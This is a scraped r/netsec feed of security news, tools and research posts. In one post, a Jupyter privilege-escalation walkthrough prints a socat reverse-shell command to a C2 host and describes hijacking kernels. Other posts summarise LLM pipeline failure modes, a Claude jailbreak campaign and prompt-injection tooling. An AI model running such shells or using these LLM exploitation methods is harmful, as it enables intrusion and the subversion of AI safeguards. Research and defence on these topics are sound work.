☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Trying to make CCNA learning more engaging for students

By: /u/Sorry_Flatworm_521 — November 16th 2025 at 17:30

Hi everyone,

My best friend and I have been working on a project after going through CCNA → CCNP ENCOR → CCNP ENARSI together. We realised that for most people (including us), the hardest part of the CCNA journey isn’t the technical content. It’s staying motivated through the long PDFs, the repetitive labs, and the feeling of studying alone.

We wanted to take some of that pain away and make learning networking feel more structured, more guided, and more rewarding. So we started building something based on short lessons, clear diagrams, and a gamification system that helps you actually feel your improvement.

The idea is to help learners stay consistent, avoid feeling lost, and have a more enjoyable path through the CCNA topics.

We’re currently sharing this with CCNA learners and mentors to see if it actually helps, and we’d definitely welcome any feedback or questions :)

submitted by /u/Sorry_Flatworm_521

Claude AI ran autonomous espionage operations

By: /u/YouCanDoIt749 — November 16th 2025 at 10:51

Anthropic just published a case study where threat actors jailbroke Claude and used it to run entire attack campaigns autonomously.

submitted by /u/YouCanDoIt749

NPMScan - Malicious NPM Package Detection & Security Scanner

By: /u/kryakrya_it — November 15th 2025 at 20:14

I built npmscan.com because npm has become a minefield. Too many packages look safe on the surface but hide obfuscated code, weird postinstall scripts, abandoned maintainers, or straight-up malware. Most devs don’t have time to manually read source every time they install something — so I made a tool that does the dirty work instantly.

What npmscan.com does:

  • Scans any npm package in seconds
  • Detects malicious patterns, hidden scripts, obfuscation, and shady network calls
  • Highlights abandoned or suspicious maintainers
  • Shows full file structure + dependency tree
  • Assigns a risk score based on real security signals
  • No install needed — just search and inspect

The goal is simple:
👉 Make it obvious when a package is trustworthy — and when it’s not.

If you want to quickly “x-ray” your dependencies before you add them to your codebase, you can try it here:

https://npmscan.com

Let me know what features you’d want next.

submitted by /u/kryakrya_it

CyberRecon project

By: /u/Sufficient_Air5988 — November 15th 2025 at 16:24

I recently completed a project on “Scanning and Enumeration with Nmap” using Kali Linux and Metasploitable2. The project includes network discovery, port scanning, service enumeration, NSE scripting, and vulnerability detection. I’ve documented all findings, screenshots, and results in a structured report. I’m sharing it here to get feedback and suggestions to improve my methodology and reporting style.

#DevTown #nmap #cybersecurity

submitted by /u/Sufficient_Air5988

Face Scraper AI like FaceSeek - netsec analysis

By: /u/Few_Extension6813 — November 15th 2025 at 13:17

FaceSeek is like Google Images but mostly for faces. It uses facial photos and a reverse photo finding method to recognize and detect a face even if it’s cropped or filtered. Plus it can also modify those faces onto somebody and make videos out of them. This could be useful for OSINT or threat hunting, but it also means attackers could find out our digital footprints by photo. Is it a threat? Or not? Considering that there are already a lot of AI tools like these, but AI is also improving daily.

submitted by /u/Few_Extension6813

🚨 FIRST PUBLIC EVIDENCE: RedTail Cryptominer Targets Docker APIs

By: /u/mario_candela — November 14th 2025 at 07:54

So my honeypot just caught something interesting: RedTail malware hitting exposed Docker APIs on port 2375/tcp.

For context, RedTail is typically known for exploiting PHP vulnerabilities, PAN-OS, and Ivanti, but not a single vendor mentions Docker in their threat reports.

I did a pretty extensive research dive across:

  • Threat intel reports (Akamai, Forescout, Trend Micro, Kaspersky)
  • SANS ISC, VirusTotal, Malpedia
  • GitHub repos and academic papers
  • Various community discussions

What I confirmed:

  • C2 IP: 178[.]16[.]55[.]224 (AS214943)
  • User-Agent: "libredtail-http" (consistent with RedTail)
  • Absolutely zero public documentation of RedTail targeting Docker

Two theories:

  1. This is a blind spot in threat intelligence reporting
  2. We're seeing a new tactical evolution of RedTail (as of Nov 2025)

Has anyone else seen similar activity?

submitted by /u/mario_candela

Milvus Proxy Authentication Bypass Vulnerability (CVE-2025-64513)

By: /u/Fit_Wing3352 — November 14th 2025 at 04:13

Analysis of the Milvus Proxy Authentication Bypass Vulnerability (CVE-2025-64513)

submitted by /u/Fit_Wing3352

Dehashed alternative for pentesters/red teamers

By: /u/Pleasant-Drawer729 — November 13th 2025 at 10:33

After we launched SysReptor a few years ago, we now published the data leak service "SysLeaks for Attackers". We're still refining the service and kindly ask for your feedback. You can use SysLeaks quite extensively during the BETA phase, which will remain open in November.

How it works:
You search for domain names and receive usernames/email addresses, plaintext passwords and (in some cases) the platform the account was used for.

Limitations:

  • Users must sign up with their company email address (we approve offensive security companies only to prevent abuse).
  • We don't disclose the leaks of the last 14 days as a grace period for affected companies.
  • Free 50 credits for up to 2.500 leaked accounts per week (during the BETA phase)

submitted by /u/Pleasant-Drawer729

Breaking mPDF with regex and logic

By: /u/ZoltyLis — November 12th 2025 at 23:24

Hello! Earlier this year I found an interesting logic quirk in an open source library, and now I wrote a medium article about it.

This is my first article ever, so any feedback is appreciated.

TLDR: mPDF is an open source PHP library for generating PDFs from HTML. Because of some logic quirks, it is possible to trigger web requests by providing it with a crafted input, even in cases where it is sanitized.

This post is not about a vulnerability! Just an unexpected behavior I found when researching an open source lib. (It was rejected by MITRE for a CVE)

submitted by /u/ZoltyLis

[DISCLOSURE] DoorDash Enabled 5-Year XSS/HTML Injection Flaw via Official Email; VDP Misclassified Report for 15 Months

By: /u/east0n12 — November 10th 2025 at 16:30

The vulnerability was a critical stored HTML Injection that allowed any free account to send zero-barrier phishing emails from the trusted [no-reply@doordash.com](mailto:no-reply@doordash.com) domain. The flaw existed for 5 years and was kept out of DoorDash's hands for 15 months by a misclassification in the HackerOne VDP process.

submitted by /u/east0n12

One Simple Mistake, Thousands at Risk - How Common Misconfigurations Could Lead to Massive Data Exposure

By: /u/we-we-we — November 10th 2025 at 11:26

This blog post is about one of the most popular agentic workflow development platforms — Dify.
It covers how simple misconfigurations can lead to the theft of critical enterprise assets, and just how common these misconfigurations actually are.

submitted by /u/we-we-we

How much latency does a Throwing Star LAN Tap add to packet capture? (practical numbers appreciated)

By: /u/JMarkG — November 8th 2025 at 21:19

Hey folks — I’ve got a Throwing Star LAN Tap (replica) and I’m using it for passively capturing traffic for lab troubleshooting and packet analysis. I’m curious about real-world experience: how much latency did you actually measure when inserting a tap like this into a gigabit link? Any numbers (µs/ms) from hardware vs. inline solutions, or tips on test methodology you recommend?

For context: I’m planning to use it for troubleshooting, capturing brief bursts for analysis, and teaching/demoing packet flows — so low added latency is important but I’m not running production workloads through it. Appreciate any real measurements, test setups, or pitfall warnings.

submitted by /u/JMarkG

Arbitrary App Installation on Intune Managed Android Enterprise BYOD in Work Profile

By: /u/Jessner10247 — November 8th 2025 at 13:57

I wrote a short blog post about a bug I discovered in late 2023 affecting Android Enterprise BYOD devices managed through Microsoft Intune, which lets the user install arbitrary apps in the dedicated Work Profile. The issue still exists today and Android considered this not a security risk: https://jgnr.ch/sites/android_enterprise.html

If you’re using this setup, you might find it interesting.

submitted by /u/Jessner10247

Another one of those!!

By: /u/bi6o — November 8th 2025 at 00:36

Yes, I know I know... But believe me, when I started it I thought I was a genius.

"Oh I can do that", I thought to myself in that moment of 'inspiration', "I bet nobody thought of it yet, have they?".

And like any self-proclaimed good developer, I started hacking at it. I never thought to ask the Internet if it's a good idea. I was convinced!

Boy, was I wrong!

All of this to say, I am proud of my tech newsletter 🙈 I worked hard on the concept, I manually edit and pick the articles that go out every (work) day, and the close beta testers have expressed it brings great value to them.

I publish five newsletters every day, covering Platform, Tech, AI, Web Development, and Crypto. I also publish the Top Headlines narrated on the landing page of the website.

Would you give me some feedback about my baby? It is unique to me, even if it's actually not 🙈

https://www.mergeconflictdigest.com

submitted by /u/bi6o

New 'Landfall' spyware exploited a Samsung 0-day delivered through WhatsApp messages

By: /u/Megabeets — November 7th 2025 at 22:15

LANDFALL — a commercial-grade Android spyware exploiting a now-patched Samsung zero-day (CVE-2025-21042) through weaponized DNG images sent via WhatsApp, enabling zero-click compromise of Samsung Galaxy devices.

This isn't an isolated incident. LANDFALL is part of a larger DNG exploitation wave. Within months, attackers weaponized image parsing vulnerabilities across Samsung (CVE-2025-21042, CVE-2025-21043) and Apple (CVE-2025-43300 chained with WhatsApp CVE-2025-55177 for delivery)

It seems like DNG image processing libraries became a new attack vector of choice – suspiciously consistent across campaigns. Samsung had two zero-days in the same library, while a parallel campaign hit iOS - all exploiting the same file format. Should we expect more?

submitted by /u/Megabeets

Free IOC tool

By: /u/Cute_Leading_3759 — November 7th 2025 at 19:39

Developed a tool that parses IOCs and creates relationships with known threat reporting

submitted by /u/Cute_Leading_3759

I built Ashes CTI: a dual-mode (CLI + UI) Threat Intelligence platform for Windows

By: /u/Minimum_Call_3677 — November 6th 2025 at 11:10

I've built an OSINT Cybersecurity Threat Intelligence Platform for Windows.

Features:

  • Dual Mode Operation (CLI + UI)
  • Curated OSINT Ingestion
  • Analyst-grade Summaries
  • MITRE ATT&CK Mapping
  • IOC Extraction + Enrichment
  • SIEM/EDR Integration via TAXII/STIX/CSV
  • No cloud - works offline
  • Perfect for isolated or air-gapped environments
  • No data collection

The Windows Installer is free to download.

Licenses are being given out for free during the Beta.

Feedback, testing and feature suggestions are welcome.

submitted by /u/Minimum_Call_3677

BugBounty Directory

By: /u/abhishekY495 — November 5th 2025 at 13:16

I’ve been working on a side project to help bug bounty hunters discover lesser-known programs that are not listed on platforms like HackerOne or Bugcrowd as you know they are crowded.

I have added around 100+ programs that I found through Google dorks and I have many more, so I will be adding them very soon. Each program has its own page showing if they offer reward, swag or hall of fame, and I also break down the reward from low to high.

Have been doing bug bounty myself and I know that a lot of programs are out there and I kept a personal list, and figured — why not turn it into something public and helpful for the community.

Also have added blog posts from bug bounty hunters and plan on growing the blog collection as well.

Would love to get your feedback — ideas, suggestions, anything broken, or stuff you’d like to see added (especially if you write blogs yourself). Totally open to contributors too.

I want https://bugbountydirectory.com to be a one stop place for bug bounty hunters.

submitted by /u/abhishekY495

New! Cloud Filter Arbitrary File Creation EoP Patch Bypass LPE - CVE-2025-55680

By: /u/SSDisclosure — November 5th 2025 at 10:16

A vulnerability in the Windows Cloud File API allows attackers to bypass a previous patch and regain arbitrary file write, which can be used to achieve local privilege escalation.

submitted by /u/SSDisclosure

Privilege Escalation With Jupyter From the Command Line

By: /u/ok_bye_now_ — November 4th 2025 at 22:53

This is not a vulnerability in Jupyter. This is a code execution feature working as designed. When Jupyter is properly configured with token authentication (the default), this technique wouldn't work. The issue comes about when administrators disable security features and run Jupyter with elevated privileges—a dangerous combination on a shared machine.

For those unfamiliar, Jupyter is the Swiss Army knife of data science—a web-based environment where researchers and analysts write code, visualize data, and document their findings all in one place. It’s code execution as a service, basically.

My first instinct was to check if the Jupyter server was accessible

It was. The API was responding, and even better—no authentication token required. This meant the server was either running with --NotebookApp.token='' or I was accessing it from a trusted network. Either way, Christmas came early.

WebSockets and Terminals

Here's where things got a little more interesting. Jupyter's REST API documentation showed an interesting endpoint: /api/terminals. Unlike the kernel API (which executes Python code), the terminal API provides actual shell access. And I could create a terminal session fairly easily.

But there’s a catch. Terminals in Jupyter communicate over WebSocket, not HTTP. Traditional tools like curl or nc wouldn't work. I needed something that could speak WebSocket from the command line.

After some research, I discovered websocat—essentially netcat for WebSockets. It's a binary that bridges the gap between command-line tools and WebSocket services. Perfect for situations like this.

Abusing the Terminal API

With websocat in hand, I could now interact with Jupyter's terminal WebSocket, but it wasn’t immediately obvious how to send commands from the terminal. The Jupyter Client WebSocket documentation on WebSocket protocols provides some details about how messages are passed between kernels and the Jupyter web application. And the Terminado client’s websocket implementation outlines the format needed to interact with Jupyter.

So when you connect to a Jupyter terminal via WebSocket, you're not getting a raw shell - you're talking to a protocol handler that expects JSON arrays where the

  • first element is message type ("stdin", "stdout", "setup", etc.)
  • second element is the payload (for stdin, it's the command text)

This lets Jupyter multiplex different data streams (input, output, control messages) over a single WebSocket connection. So sending ["stdin", "command"] is how you talk to Jupyter's terminal WebSocket protocol.

And when you connect, it seems to take a second to initialize the WebSocket connection, and it wouldn’t immediately take my commands, so the elegant solution is to sleep. And so, echoing a command like this:

UID 0? Of course, the Jupyter server was running as root, and the terminal API was giving me a root shell. No sudo required, no privilege escalation needed—just ask nicely and receive.

Accessing Kernel Secrets

With root access through the terminal, I could now read Jupyter's runtime files:

These kernel connection files contained:

  • Connection ports for each running kernel
  • HMAC signing keys for message authentication
  • Session information

With these, I could connect directly to any running notebook kernel and execute code in other users' sessions. Session hijacking for data science.

For easier interaction, I established a proper reverse shell:

$ (sleep 1; echo '["stdin", "socat exec:\"bash -li\",pty,stderr,setsid,sigint,sane tcp:my.c2.server:4444 &\n"]'; sleep 1; echo '["stdin", "exit\n"]') | ./websocat "ws://localhost:8888/terminals/websocket/1"

Now I had a fully interactive root shell, running through Jupyter's own process. To any monitoring system, this might look like legitimate Jupyter activity.

This isn't a vulnerability in Jupyter—it's a deployment anti-pattern.

  1. Running as root - Jupyter was running with root privileges, probably because someone needed GPU access or wanted to avoid permission issues
  2. No authentication - The server was started with authentication disabled, for convenience
  3. Exposed terminal API - The terminal feature was enabled (default in many installations)

Together, these created a perfect storm. Any user with local access could escalate to root through Jupyter's intended functionality.

Don’t Run Jupyter as Root

If you need multi-user Jupyter, use tools designed for it:

Need GPU access without root? Use capabilities:

Map out what users actually need:

  • Read/write to their notebook directory?
  • Install pip packages? → User-writable virtual environment
  • Access GPUs? → Device permissions, not root
  • Run system commands? → Whitelist specific commands with sudo (but be careful with this)

If users legitimately need shell access, try to isolate it properly.

So don’t run services as root because it's easier, disable authentication for convenience, or treat development defaults as production-ready.

Jupyter is great for interactive data science. The terminal API is genuinely useful for package installation and environment debugging. But these same features are ripe for abuse if deployed without proper consideration.

Downloading websocat and echoing commands is fine for janky use, but how about a little client to drop into a shell?

Check out jupyter-shell

submitted by /u/ok_bye_now_
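A defender-side check for the deployment anti-pattern the post above describes, written as an added example (not the post's code and not Jupyter's own tooling): it reads the NotebookApp/ServerApp traits from a config file or from the server's command line, flags the three conditions (root, authentication disabled, terminal API enabled), and additionally flags a wildcard bind, which goes beyond the post's three points. The config text and argv below are constructed for the demo; the trait names (token, password, terminals_enabled, ip) are Jupyter's.

```python
"""Audit a Jupyter deployment for the root + no-auth + terminals combination."""
import ast
import re

# A jupyter_notebook_config.py / jupyter_server_config.py line such as
#   c.NotebookApp.token = ''
CONFIG_RE = re.compile(r"^\s*c\.(?:NotebookApp|ServerApp)\.(\w+)\s*=\s*(.+?)\s*$")
# The same trait on the command line, as in the post's --NotebookApp.token=''
ARGV_RE = re.compile(r"^--(?:NotebookApp|ServerApp)\.(\w+)=(.*)$")

# Jupyter's defaults for the traits that matter here. "<random>" stands for the
# token Jupyter generates on startup when none is configured.
DEFAULTS = {"token": "<random>", "password": "", "terminals_enabled": True, "ip": "localhost"}


def _literal(raw):
    """Evaluate the right-hand side as a Python literal; fall back to the raw text."""
    try:
        return ast.literal_eval(raw)
    except (ValueError, SyntaxError):
        return raw


def parse_config(text):
    """Collect c.<App>.<trait> = <value> assignments from a Jupyter config file."""
    settings = {}
    for line in text.splitlines():
        m = CONFIG_RE.match(line)
        if m:
            settings[m.group(1)] = _literal(m.group(2))
    return settings


def parse_argv(argv):
    """Collect --<App>.<trait>=<value> overrides from the server's command line.

    After shell quoting, --NotebookApp.token='' reaches the process (and
    /proc/<pid>/cmdline) as --NotebookApp.token= with an empty value.
    """
    settings = {}
    for arg in argv:
        m = ARGV_RE.match(arg)
        if m:
            settings[m.group(1)] = _literal(m.group(2))
    return settings


def audit(settings, euid):
    """Return the anti-patterns present, given merged settings and the server's effective UID."""
    s = {**DEFAULTS, **settings}
    findings = []
    if euid == 0:
        findings.append("running as root: every terminal and kernel it spawns is root")
    if s["token"] == "" and s["password"] == "":
        findings.append("authentication disabled: empty token and no password hash")
    if s["terminals_enabled"]:
        findings.append("terminal API enabled: /api/terminals hands out an interactive shell")
    # Beyond the post's three points: a wildcard bind widens who can reach the API.
    if s["ip"] in ("0.0.0.0", "*", "::"):
        findings.append(f"bound to all interfaces ({s['ip']}), not just localhost")
    return findings


def is_perfect_storm(findings):
    """True when root, no auth and terminals coincide (the post's 'perfect storm')."""
    keys = ("running as root", "authentication disabled", "terminal API enabled")
    return all(any(f.startswith(k) for f in findings) for k in keys)


def demo():
    """Constructed inputs that mirror the deployment in the post (not captured data)."""
    weak_cfg = "c.NotebookApp.ip = '0.0.0.0'\nc.NotebookApp.terminals_enabled = True\n"
    weak_argv = ["jupyter", "notebook", "--allow-root", "--NotebookApp.token="]
    weak = audit({**parse_config(weak_cfg), **parse_argv(weak_argv)}, euid=0)
    hardened_cfg = ("c.ServerApp.token = 'replace-with-a-long-random-value'\n"
                    "c.ServerApp.terminals_enabled = False\n")
    hardened = audit(parse_config(hardened_cfg), euid=1000)
    return weak, hardened


if __name__ == "__main__":
    weak, hardened = demo()
    for finding in weak:
        print("[!]", finding)
    print("perfect storm:", is_perfect_storm(weak))
    print("hardened config findings:", hardened)
```

On a live host, feed it the config file's text plus the argv from /proc/<pid>/cmdline and the process's euid from ps.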

Built SlopGuard - open-source defense against AI supply chain attacks (slopsquatting)

By: /u/techoalien_com — November 4th 2025 at 14:16

I was cleaning up my dependencies last month and realized ChatGPT had suggested "rails-auth-token" to me. Sounds legit, right? Doesn't exist on RubyGems.

The scary part: if I'd pushed that to GitHub, an attacker could register it with malware and I'd install it on my next build. Research shows AI assistants hallucinate non-existent packages 5-21% of the time.

I built SlopGuard to catch this before installation. It:

  • Verifies packages actually exist in registries (RubyGems, PyPI, Go modules)
  • Uses 3-stage trust scoring to minimize false positives
  • Detects typosquats and namespace attacks
  • Scans 700+ packages in 7 seconds

Tested on 1000 packages: 2.7% false positive rate, 96% detection on known supply chain attacks.

Built in Ruby, about 2500 lines, MIT licensed.

GitHub: https://github.com/aditya01933/SlopGuard

Background research and technical writeup: https://aditya01933.github.io/aditya.github.io/

Homepage https://aditya01933.github.io/aditya.github.io/slopguard

Main question: Would you actually deploy this or is the problem overstated? Most devs don't verify AI suggestions before using them.

submitted by /u/techoalien_com

Linux kernel Bluetooth RCE

By: /u/elatllat — November 4th 2025 at 12:40

CVE-2025-38593

2025-08-15

< 6.12.42

submitted by /u/elatllat

New Research: RondoDox v2, a 650% Expansion in Exploits

By: /u/mario_candela — November 4th 2025 at 09:08

Through our honeypot (https://github.com/mariocandela/beelzebub), I’ve identified a major evolution of the RondoDox botnet, first reported by FortiGuard Labs in 2024.

The newly discovered RondoDox v2 shows a dramatic leap in sophistication and scale:
🔺 +650% increase in exploit vectors (75+ CVEs observed)
🔺 New C&C infrastructure on compromised residential IPs
🔺 16 architecture variants
🔺 Open attacker signature: bang2013@atomicmail[.]io
🔺 Targets expanded from DVRs and routers to enterprise systems

The full report includes:
- In-depth technical analysis (dropper, ELF binaries, XOR decoding)
- Full IOC list
- YARA and Snort/Suricata detection rules
- Discovery timeline and attribution insights

submitted by /u/mario_candela

[Research] Unvalidated Trust: Cross-Stage Failure Modes in LLM/agent pipelines arXiv

By: /u/Solid-Tomorrow6548 — November 3rd 2025 at 23:59

The paper analyzes trust between stages in LLM and agent toolchains. If intermediate representations are accepted without verification, models may treat structure and format as implicit instructions, even when no explicit imperative appears. I document 41 mechanism level failure modes.

Scope

  • Text-only prompts, provider-default settings, fresh sessions.
  • No tools, code execution, or external actions.
  • Focus is architectural risk, not operational attack recipes.

Selected findings

  • §8.4 Form-Induced Safety Deviation: Aesthetics/format (e.g., poetic layout) can dominate semantics -> the model emits code with harmful side-effects despite safety filters, because form is misinterpreted as intent.
  • §8.21 Implicit Command via Structural Affordance: Structured input (tables/DSL-like blocks) can be interpreted as a command without explicit verbs (“run/execute”), leading to code generation consistent with the structure.
  • §8.27 Session-Scoped Rule Persistence: Benign-looking phrasing can seed a latent session rule that re-activates several turns later via a harmless trigger, altering later decisions.
  • §8.18 Data-as-Command: Fields in data blobs (e.g., config-style keys) are sometimes treated as actionable directives -> the model synthesizes code that implements them.

Mitigations (paper §10)

  • Stage-wise validation of model outputs (semantic + policy checks) before hand-off.
  • Representation hygiene: normalize/label formats to avoid “format -> intent” leakage.
  • Session scoping: explicit lifetimes for rules and for the memory
  • Data/command separation: schema aware guards

Limitations

  • Text-only setup; no tools or code execution.
  • Model behavior is time dependent. Results generalize by mechanism, not by vendor.

submitted by /u/Solid-Tomorrow6548

Sniffing established BLE connections with HackRF One

By: /u/uBaze — November 3rd 2025 at 17:14

Bluetooth Low Energy (BLE) powers hundreds of millions of IoT devices — trackers, medical sensors, smart home systems, and more. Understanding these communications is essential for security research and reverse engineering. In our latest article, we explore the specific challenges of sniffing a frequency-hopping BLE connection with a Software Defined Radio (SDR), the new possibilities this approach unlocks, and its practical limitations.

🛠️ What you’ll learn:

  • Why SDRs (like the HackRF One) are valuable for BLE analysis
  • The main hurdles of frequency hopping — and how to approach them
  • What this means for security audits and proprietary protocol discovery

➡️ Read the full post on the blog

submitted by /u/uBaze

RondoDox v2: When an IoT Botnet Goes Enterprise-Ready

By: /u/mario_candela — November 3rd 2025 at 14:16

I've just published my analysis on RondoDox v2, and the numbers speak for themselves: +650% exploit vectors compared to v1 documented by FortiGuard Labs.

Key Findings:
- 15+ exploitation vectors (from 2 CVEs to enterprise-grade attacks)
- C&C on compromised residential IP (multiple AWS EC2)
- 16 architectures supported with XOR obfuscation (key: 0x21)
- Open attribution: [bang2013@atomicmail.io](mailto:bang2013@atomicmail.io)

🚨 What concerns me:
The jump from consumer DVR/routers to enterprise targets demonstrates an aggressive expansion strategy.
We're no longer talking about a "simple" DDoS botnet.

🟢 IOCs and detection rules: YARA, Snort/Suricata and complete IOC list available in the full post.

submitted by /u/mario_candela

Breaking Down 8 Open Source AI Security Tools at Black Hat Europe 2025 Arsenal

By: /u/No-Emotion9668 — November 3rd 2025 at 09:47

AI and security are starting to converge in more practical ways. This year’s Black Hat Europe Arsenal shows that trend clearly, and this article introduces 8 open-source tools that reflect the main areas of focus. Here’s a preview of the 8 tools mentioned in the article:

Tools (sorted by official website), with positioning, features and core functions, and source code:

  • A.I.G. (AI-Infra-Guard): AI Security Risk Self-Assessment. Rapidly scans AI infrastructure and MCP service vulnerabilities, performs large model security check-ups (LLM jailbreak evaluation), features a comprehensive front-end interface, and has 1800+ GitHub Stars. Source: https://github.com/Tencent/AI-Infra-Guard
  • Harbinger: AI-Driven Red Team Platform. Leverages AI for automated operations, decision support, and report generation to enhance red team efficiency. 100+ GitHub Stars. Source: https://github.com/mandiant/harbinger
  • MIPSEval: LLM Conversational Security Evaluation. Focuses on evaluating the security of LLMs in multi-turn conversations, detecting vulnerabilities and unsafe behaviors that may arise during sustained interaction. Source: https://github.com/stratosphereips/MIPSEval
  • Patch Wednesday: AI-Assisted Vulnerability Remediation. Uses a privately deployed LLM to automatically generate patches based on CVE descriptions and code context, accelerating the vulnerability remediation process. Source: Pending Open Source
  • Red AI Range (RAR): AI Security Cyber Range. Provides a deployable virtual environment for practicing and evaluating attack and defense techniques against AI/ML systems. Source: https://github.com/ErdemOzgen/RedAiRange
  • OpenSource Security LLM: Open Source Security LLM Application. How to train (fine-tune) small-parameter open-source LLMs to perform security tasks such as threat modeling and code review. Source: Pending Open Source
  • SPIKEE: Prompt Injection Evaluation Toolkit. A simple, modular tool for evaluating and exploiting prompt injection vulnerabilities in Large Language Models (LLMs). Source: https://github.com/ReversecLabs/spikee
  • SQL Data Guard: LLM Database Interaction Security. Deployed inline or via MCP (Model-in-the-Middle Context Protocol) to protect the security of LLM-database interactions and prevent data leakage. Source: https://github.com/ThalesGroup/sql-data-guard

submitted by /u/No-Emotion9668

/r/netsec's Q4 2025 Information Security Hiring Thread

By: /u/netsec_burn — November 2nd 2025 at 16:12

Overview

If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company.

We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education.

Please reserve top level comments for those posting open positions.

Rules & Guidelines

Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work.

  • If you are a third party recruiter, you must disclose this in your posting.
  • Please be thorough and upfront with the position details.
  • Use of non-hr'd (realistic) requirements is encouraged.
  • While it's fine to link to the position on your company's website, provide the important details in the comment.
  • Mention if applicants should apply officially through HR, or directly through you.
  • Please clearly list citizenship, visa, and security clearance requirements.

You can see an example of acceptable posts by perusing past hiring threads.

Feedback

Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.)

submitted by /u/netsec_burn

Quantifying Swiss Cheese, the Bayesian Way

By: /u/t0sche — November 1st 2025 at 18:20

I wrote a short piece on how to actually quantify the classic Swiss-cheese model of defense instead of just showing it in slides.

Using Bayesian updating, I show how you can take EPSS scores for CVEs on an asset, layer in control effectiveness (like firewall, EDR, etc.), and update those probabilities over time as you get real data.

It’s a lightweight, data-driven way to express how much your defenses actually reduce exploit likelihood, and it ties nicely into FAIR-CAM thinking too.

Would love feedback or discussion from anyone doing something similar with telemetry or Bayesian models.

submitted by /u/t0sche

open source CVE scanner for project dependencies. VSCode extension.

By: /u/FeelingResolution806 — November 1st 2025 at 14:32

VulScan-MCP scans project dependencies for latest known CVEs from NVD and OSV databases in real time

Integrates with VS Code and GitHub Copilot. Ask "Check for security vulnerabilities" and it scans your manifest files.

Only reports actual CVEs, not deprecated packages or outdated versions.

Doesn't auto-patch anything. Just provides information and remediation guidance in easy to follow language.

Source code: https://github.com/abhishekrai43/VulScan-MCP

Marketplace: Search "VulScan-MCP"

submitted by /u/FeelingResolution806
[link] [comments]
/r/netsec - Information Security News & Discussion

r/netsec monthly discussion & tool thread

By: /u/albinowax — November 1st 2025 at 14:29

Questions regarding netsec and discussion related directly to netsec are welcome here, as is sharing tool links.

Rules & Guidelines

  • Always maintain civil discourse. Be awesome to one another - moderator intervention will occur if necessary.
  • Avoid NSFW content unless absolutely necessary. If used, mark it as being NSFW. If left unmarked, the comment will be removed entirely.
  • If linking to classified content, mark it as such. If left unmarked, the comment will be removed entirely.
  • Avoid use of memes. If you have something to say, say it with real words.
  • All discussions and questions should directly relate to netsec.
  • No tech support is to be requested or provided on r/netsec.

As always, the content & discussion guidelines should also be observed on r/netsec.

Feedback

Feedback and suggestions are welcome, but don't post it here. Please send it to the moderator inbox.

submitted by /u/albinowax
[link] [comments]
/r/netsec - Information Security News & Discussion

EDR-Redir V2: Blind EDR With Fake "Program Files"

By: /u/Cold-Dinosaur — November 1st 2025 at 10:52

EDR-Redir V2 can redirect entire folders like "Program Files" to point back to themselves, except for the antivirus and EDR folders. This means that other software continues to function normally, while only the EDR is redirected or blocked.

submitted by /u/Cold-Dinosaur
[link] [comments]
/r/netsec - Information Security News & Discussion

Automating COM/DCOM vulnerability research

By: /u/TangeloPublic9554 — October 30th 2025 at 20:24

COM (Component Object Model) and DCOM (Distributed COM) have been interesting components in Windows from a security perspective for many years. In the past, COM has been a target for many purposes. Not only have many vulnerabilities been discovered in COM, but it is also used for lateral movement or bypassing techniques.

This white paper describes how COM/DCOM works and what complications it has. In the next chapters, the white paper will describe how security research can be automated using the fuzzing approach. Since this approach comes with some problems, it describes how these problems were overcome (at least partially).

submitted by /u/TangeloPublic9554
[link] [comments]
/r/netsec - Information Security News & Discussion

Can you break our pickle sandbox? Blog + exploit challenge inside

By: /u/valmarelox — October 30th 2025 at 17:47

I've been working on a different approach to pickle security with a friend.
We wrote up a blog post about it and built a challenge to test if it actually holds up. The basic idea: we intercept and block the dangerous operations at the interpreter level during deserialization (RCE, file access, network calls, etc.). Still experimental, but we tested it against 32+ real vulnerabilities and got <0.8% performance overhead.
Blog post with all the technical details: https://iyehuda.substack.com/p/we-may-have-finally-fixed-pythons
Challenge site (try to escape): https://pickleescape.xyz
Curious what you all think - especially interested in feedback if you've dealt with pickle issues before or know of edge cases we might have missed.

submitted by /u/valmarelox
[link] [comments]
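For readers who have not dealt with pickle issues before, the following added example shows the attack surface the post is talking about and the conventional defence against it: restricting which globals `find_class` may resolve. This is not the interpreter-level interception the authors describe and not their code; it is the simpler allow-list approach, included here so the difference is concrete. The "malicious" payload is constructed inline and calls the harmless `os.getcwd` in place of `os.system`, so the demo is safe to run.

```python
"""Added example: allow-listing globals during unpickling.

Illustrates why pickle.loads on untrusted bytes is code execution, and the
classic mitigation (restrict find_class). The payload below is constructed and
calls os.getcwd as a stand-in for os.system.
"""
import io
import os
import pickle


class Evil:
    """Any object whose __reduce__ names a callable gets that callable run on load."""

    def __reduce__(self):
        # A real payload would return (os.system, ("curl attacker|sh",)); getcwd is the stand-in.
        return (os.getcwd, ())


MALICIOUS = pickle.dumps(Evil())            # constructed attacker payload
BENIGN = pickle.dumps({"user": "alice", "roles": ["viewer"], "n": 3})
EXPECTED_CWD = os.getcwd()                  # what the payload returns when it executes

# Only these (module, name) pairs may be resolved from the pickle stream.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
    ("datetime", "datetime"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def unsafe_loads(data: bytes):
    """Stock pickle.loads: executes whatever callable the stream names."""
    return pickle.loads(data)


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_safe_loads(data: bytes) -> tuple[bool, object]:
    """Return (accepted, value_or_reason) so callers can assert on the outcome."""
    try:
        return True, safe_loads(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


if __name__ == "__main__":
    print("unsafe:", unsafe_loads(MALICIOUS))   # prints the cwd: the callable ran
    print("safe:  ", try_safe_loads(MALICIOUS))  # (False, 'blocked global ...getcwd')
    print("benign:", try_safe_loads(BENIGN))
```

The limitation of this allow-list approach is that every permitted global is a potential gadget: allow `builtins.getattr` or `operator.attrgetter` and a stream can chain its way back to dangerous calls without ever naming them directly. That is the class of edge case a deserialization sandbox has to account for.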
/r/netsec - Information Security News & Discussion

